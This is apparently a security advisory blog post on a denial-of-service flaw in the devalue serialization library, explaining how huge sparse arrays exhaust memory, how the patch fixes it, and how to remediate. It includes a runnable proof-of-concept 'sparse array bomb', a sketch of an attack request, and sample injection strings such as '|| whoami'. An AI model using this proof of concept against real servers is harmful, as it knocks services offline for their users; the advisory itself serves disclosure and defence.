Feb 20, 2026
Versions of `devalue` prior to 5.6.3 iterate linearly over sparse arrays during serialization. An attacker can define an array with a length of 100 million containing a single item, causing the server to hang while it generates a massive string of hole sentinels. The fix introduces a cost-based heuristic that switches to a 'sparse' encoding format when that representation is cheaper.
A high-severity algorithmic complexity vulnerability in the `devalue` library, a staple of the Svelte ecosystem, allows attackers to trigger Denial of Service (DoS) via memory exhaustion. By supplying specially crafted sparse arrays (arrays with massive lengths but few actual elements), attackers can force the serialization engine into an O(L) operation (where L is the array length) rather than O(N) (where N is the number of populated elements). This results in the server attempting to allocate gigabytes of memory to represent 'empty' space.
In the world of Server-Side Rendering (SSR), data serialization is the bridge between the server's brain and the client's browser. You calculate the state on the backend, freeze it into a string, ship it over the wire, and rehydrate it on the frontend. Svelte (and SvelteKit) relies heavily on a library called `devalue` for this task. Unlike `JSON.stringify`, `devalue` is smart: it handles circular references, `undefined`, `Map`, `Set`, and `BigInt`.
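A quick contrast shows the appeal (a minimal sketch; the exact encoding `devalue` emits is an internal detail, so the comments only describe the behavior):

```js
const devalue = require('devalue');

// JSON.stringify silently drops this state; devalue round-trips it.
const state = new Map([['count', 1n]]); // a Map holding a BigInt

console.log(JSON.stringify(state));    // '{}' (the data is silently lost)
console.log(devalue.stringify(state)); // an encoding devalue.parse() can restore
```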
But sometimes, trying to be too smart makes you stupid. The vulnerability we're looking at today isn't about malicious code injection or prototype pollution. It's about nothing. Literally.
JavaScript arrays are weird. You can have an array with a `length` of a billion but only one actual value at index 0. This is a "sparse array." To the runtime, it's just an object with a `length` property and a few keys. But if you try to iterate over it like a dense list, you're going to have a bad time. `devalue` walked right into this trap, treating the void as something that needed to be exhaustively cataloged.
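You can see the mismatch in any Node.js REPL (a tiny demonstration of plain JavaScript behavior, nothing devalue-specific):

```js
const arr = [];
arr[999999999] = 'lonely';

console.log(arr.length);              // 1000000000
console.log(Object.keys(arr).length); // 1 (only one real key exists)
console.log(0 in arr);                // false: index 0 is a "hole"
```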
The root cause is a classic algorithmic complexity error: confusing `array.length` with the amount of data actually present. Prior to version 5.6.3, `devalue` used a standard linear loop to process arrays. Whether the array was dense (`[1, 2, 3]`) or sparse (`[1, <99 empty items>, 2]`), the logic remained the same.
Here is the logic flaw in pseudocode:
```js
// The naive approach: the loop bound is array.length, not the key count
for (let i = 0; i < array.length; i++) {
  if (i in array) {
    serialize(array[i]);
  } else {
    // Write a "hole" sentinel for the missing index
    output.push(HOLE);
  }
}
```

See the problem? If `array.length` is 100,000,000, the loop runs 100 million times. It doesn't matter that the array is almost entirely empty; the loop condition checks the length, not the keys. In `devalue`, the `HOLE` constant (represented as `-2` in the serialized output) serves as a placeholder for these empty slots.
So, if an attacker sends a payload containing `const arr = []; arr[1e8] = 1;`, `devalue` attempts to generate an internal array containing 99,999,999 `-2` sentinels. This explodes memory usage instantly, turning a payload of a few bytes into a multi-gigabyte allocation on the heap.
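Back-of-envelope arithmetic makes the blow-up concrete (assuming, per the format described above, roughly 3 characters per hole, e.g. `,-2`):

```js
const length = 1e8;       // attacker-chosen array length
const holes = length - 1; // one real element; everything else is a hole
const bytesPerHole = 3;   // e.g. ",-2" per hole sentinel

const mb = (holes * bytesPerHole) / 1e6;
console.log(`~${mb.toFixed(0)} MB of sentinels`); // ~300 MB, before joining
```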
The patch provided in commit 819f1ac7475ab37547645cfb09bf2f678a799cf0 is a masterclass in defensive coding for serialization. The maintainers didn't just cap the array length; they implemented a cost-based heuristic to determine the most efficient way to represent the data.
The fix introduces a new concept: `SPARSE` encoding (sentinel `-7`). Instead of writing out every hole, the serializer now calculates two costs: the cost of the dense encoding (every hole written out as a sentinel) and the cost of the sparse encoding (an explicit index/value pair per populated slot). It then emits whichever representation is cheaper.
Let's look at the logic introduced in `stringify.js` (simplified):

```js
// New heuristic in stringify.js (simplified)
const keys = Object.keys(value);
let dense_cost = 0;
let sparse_cost = 0;

for (const index in value) {
  // Iterates ONLY the populated keys, never the full length!
  // ...accumulate the per-value cost for each representation...
}

// Each hole in the dense representation costs ~3 chars (e.g. ",-2")
dense_cost += (value.length - keys.length) * 3;

if (sparse_cost < dense_cost) {
  // Switch to SPARSE mode: sentinel, declared length, then index/value pairs
  str = `[${SPARSE},${value.length},${encoded_sparse_values}]`;
} else {
  // Use the standard dense mode
}
```

This is brilliant. It uses `for (const index in value)` to iterate only the populated keys. If the array is mostly empty, `sparse_cost` wins, and the output becomes a compact list of indices and values: `[-7, 100000000, 0, "my_value"]`. No hundred-million-iteration loop, no memory explosion.
Exploiting this is trivially easy and requires zero authentication if the target application exposes an endpoint that accepts JSON (or other structures) and renders it via SSR. Note that JSON itself cannot express holes, so `JSON.parse` always produces dense arrays; an attacker instead needs a code path where the input is processed or generated dynamically, or where the system uses `devalue` to serialize internal state that can be manipulated by user input (such as session data or cart items).
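As a concrete illustration of that last scenario, here is a hypothetical server-side pattern (invented for this post, not taken from any real codebase) in which a user-controlled numeric ID silently creates a sparse array:

```js
// Attacker submits an item with an enormous numeric ID
const userSuppliedItems = [{ id: 99999999, name: 'widget' }];

const cart = [];
for (const item of userSuppliedItems) {
  cart[item.id] = item; // cart.length is now 100,000,000
}

// If `cart` later flows into devalue.stringify() during SSR,
// the vulnerable loop runs 100 million times.
```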
Here is a Proof of Concept (PoC) that demonstrates the hang:
```js
const devalue = require('devalue');

// 1. Create a "bomb":
//    a sparse array with a massive length but only one element.
const sparseBomb = [];
sparseBomb[99999999] = 'Goodbye Memory';

console.log("[+] Detonating sparse array bomb...");
console.time("Explosion Duration");

try {
  // 2. Trigger the vulnerability.
  //    This will try to allocate ~300MB+ for the string builder array
  //    immediately, then iterate 100 million times.
  const serialized = devalue.stringify(sparseBomb);
  console.log("Serialized length: " + serialized.length);
} catch (e) {
  console.log("[!] Crash confirmed: " + e.message);
}

console.timeEnd("Explosion Duration");
```

On a standard single-threaded Node.js server, this operation blocks the event loop completely. CPU usage spikes to 100%, and the garbage collector (GC) goes into a panic spiral trying to reclaim memory, eventually leading to a process crash or a frozen server that stops responding to health checks.
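To watch the event-loop starvation directly, here is a small variation on the PoC (the heartbeat and the timings are illustrative): the interval stops printing the moment `stringify` begins and, if the process survives, resumes only after it returns.

```js
const devalue = require('devalue');

// Heartbeat: prints four times per second while the event loop is healthy
setInterval(() => console.log('heartbeat', new Date().toISOString()), 250);

const bomb = [];
bomb[99999999] = 'x';

// After one second of healthy heartbeats, the log goes silent (Ctrl+C to exit)
setTimeout(() => devalue.stringify(bomb), 1000);
```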
The impact here is a high-reliability Denial of Service (DoS). Because Node.js is single-threaded, a CPU-bound loop like this doesn't just slow down the request that caused it—it stops the entire server from processing any requests.
In a Kubernetes environment, the liveness probe will fail, causing the pod to restart. If the attacker simply sends this payload repeatedly, they can keep the pods in a perpetual state of crashing and restarting (CrashLoopBackOff).
Why is this juicy?
It typically bypasses standard WAF rules. WAFs look for SQL injection (`' OR 1=1`), XSS (`<script>`), or command injection (`|| whoami`). They rarely inspect the `length` property of a JSON array or the semantic "sparseness" of a data structure. It's a logic bomb that looks like valid data.
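For instance, a hypothetical attack request for the cart pattern sketched earlier is just a small, well-formed JSON object; there is nothing for a signature-based filter to match on:

```js
const attackBody = JSON.stringify({ itemId: 99999999, qty: 1 });

console.log(attackBody);        // {"itemId":99999999,"qty":1}
console.log(attackBody.length); // 27 bytes on the wire
```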
The mitigation is straightforward: upgrade `devalue` immediately.

Remediation Steps:

1. Check `package-lock.json` or `yarn.lock` for `devalue`.
2. Run `npm update devalue` or `yarn upgrade devalue`.
3. If you cannot upgrade immediately, you must validate input arrays before they reach the serialization step. Specifically, reject arrays where `array.length` is significantly larger than `Object.keys(array).length` (a high sparseness factor), or simply enforce a hard limit on `array.length` for any user-controlled data; see the sketch below.
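As a stopgap, a minimal pre-serialization guard might look like the following (the function name and thresholds are illustrative, not part of devalue):

```js
const MAX_ARRAY_LENGTH = 10000; // hard cap for user-controlled arrays
const MAX_SPARSENESS = 4;       // length may exceed the real key count by at most 4x

function assertSafeArray(arr) {
  if (arr.length > MAX_ARRAY_LENGTH) {
    throw new Error('Array too long for serialization');
  }
  if (arr.length > Object.keys(arr).length * MAX_SPARSENESS) {
    throw new Error('Array too sparse for serialization');
  }
}

// Usage: call before handing user-influenced data to devalue.stringify()
assertSafeArray([1, 2, 3]); // passes
```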
CVSS Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| devalue (sveltejs) | < 5.6.3 | 5.6.3 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Algorithmic Complexity / Resource Exhaustion |
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Remote) |
| Affected Component | `devalue.stringify`, `devalue.uneval` |
| Fix Commit | 819f1ac7475ab37547645cfb09bf2f678a799cf0 |
The software does not properly control the allocation of resources, allowing an attacker to cause a Denial of Service by exhausting available memory or CPU.